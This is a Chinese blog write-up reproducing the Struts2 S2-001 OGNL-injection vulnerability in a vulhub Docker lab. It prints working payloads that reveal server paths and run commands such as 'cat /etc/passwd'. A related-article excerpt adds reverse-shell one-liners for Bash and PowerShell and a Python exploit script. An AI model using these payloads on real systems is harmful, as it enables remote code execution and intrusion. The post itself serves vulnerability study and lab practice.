Struts2漏洞S2-001复现

最新推荐文章于 2024-06-04 17:42:07 发布
原创 最新推荐文章于 2024-06-04 17:42:07 发布 · 1.8k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#学习 #安全 #web安全

本文介绍Struts2 S2-001漏洞的原理及复现过程,包括环境搭建、POC测试、命令执行等关键步骤。

Struts2 漏洞S2-001复现学习笔记

S2-001复现

原理:该漏洞因用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用OGNL表达式%{value}进行解析,然后重新填充到对应的表单数据中。如注册或登录页面,提交失败后一般会默认返回之前提交的数据,由于后端使用%{value}对提交的数据执行了一次OGNL 表达式解析,所以可以直接构造 Payload进行命令执行。

漏洞环境搭建

https://github.com/vulhub/vulhub/tree/master/struts2/s2-001

运行以下命令进行设置

docker-compose build
docker-compose up -d

访问 http://127.0.0.1:8080/
在这里插入图片描述

漏洞poc测试

1.输入**%{‘123’}**,sumbit
在这里插入图片描述

2.返回123,参数值,证明漏洞存在
在这里插入图片描述

构造poc

  1. 获取tomcat路径:
    %{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"}

在这里插入图片描述

语句执行后,查看返回的语句信息:
在这里插入图片描述

  1. 获取网站真实路径:
    %{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#response.println(#req.getRealPath('/')),#response.flush(),#response.close()}

在这里插入图片描述
在这里插入图片描述

  1. 构造查看权限的poc:
    %{

#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"whoami"})).redirectErrorStream(true).start(),

#b=#a.getInputStream(),

#c=new java.io.InputStreamReader(#b),

#d=new java.io.BufferedReader(#c),

#e=new char[50000],

#d.read(#e),

#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),

#f.getWriter().println(new java.lang.String(#e)),

#f.getWriter().flush(),#f.getWriter().close()

}

在这里插入图片描述

  1. 执行任意命令只需要将上面的poc中whoami替换:
    %{

#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/etc/passwd"})).redirectErrorStream(true).start(),

#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),

#d=new java.io.BufferedReader(#c),

#e=new char[50000],#d.read(#e),

#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),

#f.getWriter().println(new java.lang.String(#e)),

#f.getWriter().flush(),

#f.getWriter().close()

}

在这里插入图片描述

  1. 执行命令(带参数的命令:new java.lang.String[]{"cat","/etc/passwd"}):
    %{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"pwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

在这里插入图片描述

关闭docker环境

命令:docker-compose down -v
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052(CVE-2017-9805)
qq_51577576的博客
12-15 1986
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052(CVE-2017-9805) Apache Struts2的REST插件存在远程代码执行的高危漏洞,其编号为CVE-2017-9805(S2-052)。Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。
Struts2 命令执行漏洞 S2-045 复现:深入剖析与实战演练
xinyaoyaotu的博客
02-10 1322
在当今网络安全形势日益严峻的大环境下,Web 应用框架的安全问题始终是信息安全领域关注的焦点。Struts2 作为一款广泛应用于 Java Web 开发的开源框架,其安全性直接关系到众多 Web 应用的稳定运行。今天,我们将深入探讨并实战复现 Struts2 中臭名昭著的 S2-045 命令执行漏洞,通过对这一漏洞的原理剖析、复现过程展示以及危害分析,为 Web 开发者和安全从业者提供全面的漏洞认知,助力大家筑牢网络安全防线。
Struts2 漏洞复现之s2-001
weixin_51220765的博客
12-14 1115
Struts2 漏洞复现之s2-001 原理: 该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行。 复现步骤 1. 进入vulhub目录下漏洞环境的目录 cd vulhub-master/struts2/s2-001
Struts2 系列漏洞 - S2-001
YJ_12340的博客
06-04 564
Struts2 是较早出现实现 MVC 思想的 java 框架。struts2 在 jsp 文件中使用 ognl 表达式来取出值栈中的数据。struts 标签与 ognl 表达式的关系类似于 jstl 标签与 el 表达式的关系。[故在 jsp 文件中需引入 struts 标签库]
Apache Struts2远程代码执行漏洞(S2-001)复现
m0_58606546的博客
01-14 2602
0x01 漏洞概述 1、漏洞名称 漏洞名称:Struts Remote Code Exploit 漏洞编号:Struts2-001 漏洞类型:Remote Code Execution 2漏洞原理 Struts2 是流行和成熟的基于 MVC 设计模式的 Web 应用程序框架。 Struts2 不只是 Struts1 下一个版本,它是一个完全重写的 Struts 架构。Struts2 的标签中使用的是OGNL表达式,OGNL 是 Object Graphic Navigation Language(
struts2之s2-001
weixin_42075643的博客
01-11 462
 S2-001 影响版本:Struts 2.0.0 - Struts 2.0.8 漏洞分析: 1、 密码框可以执行代码(OGNL表达式)若输入%{1+2}会因为错误报告内容得出结果3,因此存在远程执行的漏洞,属于owasp top 10中的不安全的反序列化漏洞 2、 在输入内容时,因为代码中的递归解析表达式(源码是while表达式),在执行完%{password}后,会继续执行password内容,因此可以进行远程命令执行 3、 解决方法是,改变代码表达式的表达方法,使之不会产生递归解析即可。也就是将st
S2-001 漏洞复现
qq_36594628的博客
07-23 537
S2-001 一、漏洞原理 ​ 因用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用OGNL表达式%{value}进行解析,然后重新填充到对应的表单数据中。如注册或登录页面,提交失败后一般会默认返回之前提交的数据,由于后端使用%{value}对提交的数据执行了一次OGNL 表达式解析,所以可以直接构造 Payload进行命令执行。 二、影响版本 ​ Struts 2.0.0 - 2.0.8 三、复现步骤 1、docker开启服务 2、访问<虚拟机IP>:8080 注:我的虚拟
struts2 最新漏洞 S2-016、S2-017修补方案 .docx
08-01
Struts2 最新漏洞 S2-016、S2-017 修补方案 Struts2 是一个基于 JavaWeb 应用程序框架,由 Apache 软件基金会维护。最近,Struts2 发生了两个严重的漏洞,分别是 S2-016 和 S2-017,这两个漏洞可能会导致攻击者...
Struts2 远程代码执行漏洞S2-001分析
st3pby的博客
01-05 1471
首先来了解 OGNL 表达式,OGNL(Object Graphic Navigatino Language)的中文全称为“对象图导航语言”,是应用于Java中的一个开源的功能强大的表达式语言(Expression Language),它被集成在Struts2等框架中,通过简单一致的表达式语法,可以存取对象的任何属性,调用对象的方法,遍历整个对象的结构图,实现字段类型转化等功能。OGNL进行对象存取操作的API在Ognl.java文件中,分别是getValue、setValue两个方法。
s2-001漏洞复现
m0_74859491的博客
03-13 669
开启docker进入vulhub —struts2—s2-001命令:cd vulhub/struts2/s2-001。执行了payload 里的语句 pwd , 回显出路径:/usr/local/tomcat。(Readme.md 英文说明, Readme.zh-cn.md 中文说明)先查看说明文件 命令:cat Readme.zh-cn.md。3、启用测试环境:docker-compose up -d。回显出路径:/usr/local/tomcat。请参阅《中华人民共和国网络安全法》
struts2(s2-001)远程代码执行漏洞docker&&vulhub复现
qq_43455259的博客
07-12 3098
struts2(s2-001)远程代码执行漏洞docker&&vulhub复现
Struts2 S2-001 远程代码执行漏洞——漏洞复现
weixin_42090431的博客
12-01 211
漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行。​ 此漏洞源于 Struts 2 框架中的一个标签处理功能:altSyntax。在开启时,支持对标签中的 OGNL 表达式进行解析并执行。
S2-007 远程代码执行漏洞检测与利用
Fly_鹏程万里
12-14 1469
漏洞原理 如下age来自于用户输入,传递一个非整数给id导致错误,struts会将用户的输入当作ongl表达式执行,从而导致了漏洞。 POC a.获取tomcat执行路径: %{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"} b、获取web路径 %{ #req=@org.apache.struts2...
Struts2 远程代码执行漏洞复现(S2-001
Welcome To Myon'Blog !
03-14 1712
Struts2 是一个基于 MVC 设计模式的 Web 应用框架,作为控制器来建立模型与视图的数据交互。此漏洞源于 Struts 2 框架中的一个标签处理功能:altSyntax。在开启时,支持对标签中的 OGNL 表达式进行解析并执行。Struts 2 的 “altSyntax” 功能允许将 OGNL 表达式插入到文本字符串中并递归处理,这允许恶意用户提交一个字符串,通常通过 HTML 文本字段,其中包含一个 OGNL 表达式(如 %{1+1}),如果表单验证失败,服务器将执行该表达式。
struts2-S2-001
jjjj1029056414的博客
11-11 101
struts2-S2-001
S2-001漏洞分析
灰蜗牛
02-23 1688
Struts2是流行和成熟的基于MVC设计模式的Web应用程序框架。S2-001漏洞是由于 Struts 2 框架处理 HTTP 请求中某些参数的方式存在缺陷。具体来说,该框架无法正确验证这些参数中的用户输入,从而允许攻击者将恶意负载注入应用程序。有效负载可以包含应用程序处理请求时在服务器上执行的任意代码。
【研究】Struts2漏洞之S2-001漏洞环境和POC
god_Zeo的安全博客
07-01 2337
【研究】Struts2漏洞之S2-001漏洞环境和POC1.环境2.原理3.影响版本4.利用过程POC 1.环境 环境 https://github.com/vulhub/vulhub/blob/master/README.zh-cn.md 这个搭环境很方便快捷,具体可以看说明,很简单 2.原理 该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{v...
struts2-s2-001反序列化漏洞反弹shell
最新发布
10-29
提供的引用内容未提及struts2 s2 - 001反序列化漏洞实现反弹shell的方法。一般而言,要实现该漏洞反弹shell可按以下通用思路操作: 首先,确定目标系统的信息,如操作系统类型(Windows或Linux),这会影响反弹shell的命令。对于Linux系统,常见的反弹shell命令是`bash -i >& /dev/tcp/攻击者IP/端口 0>&1` ,在引用中的struts2 s2 - 059和S2 - 059远程代码执行漏洞复现中都有类似使用。对于Windows系统,可能会使用如`powershell -c "$client = New-Object System.Net.Sockets.TCPClient('攻击者IP',端口);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"` 然后,构造相应的漏洞利用代码。这通常要结合Struts2框架的漏洞原理,可能会涉及到使用特定的表达式或利用框架中可被利用的组件来执行命令。在引用[2]的Java反序列化漏洞复现weblogic和s2)中给出了一个Java反序列化漏洞利用代码示例,虽然不是针对s2 - 001,但思路是通过构造包含执行命令的XMLDecoder代码来执行反弹shell命令。 最后,将构造好的反弹shell命令进行适当处理,如在引用中提到的反弹shell的bash需要经过base64编码 ,然后将处理后的命令嵌入到漏洞利用代码中,向目标系统发送请求以触发漏洞,实现反弹shell。 以下是一个简单模拟的Python脚本示例(仅作示意,实际需根据具体情况调整): ```python import requests import base64 # 反弹shell命令 reverse_shell = "bash -i >& /dev/tcp/192.168.1.100/8888 0>&1" # base64编码 encoded_shell = base64.b64encode(reverse_shell.encode()).decode() # 假设的漏洞利用URL url = "http://target.com/struts2-action" # 假设的漏洞利用参数 payload = f"${{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{{'/bin/bash', '-c', '{encoded_shell}'}})).start()}}" params = { "param": payload } response = requests.get(url, params=params) print(response.text) ```
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

脚本实习生

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值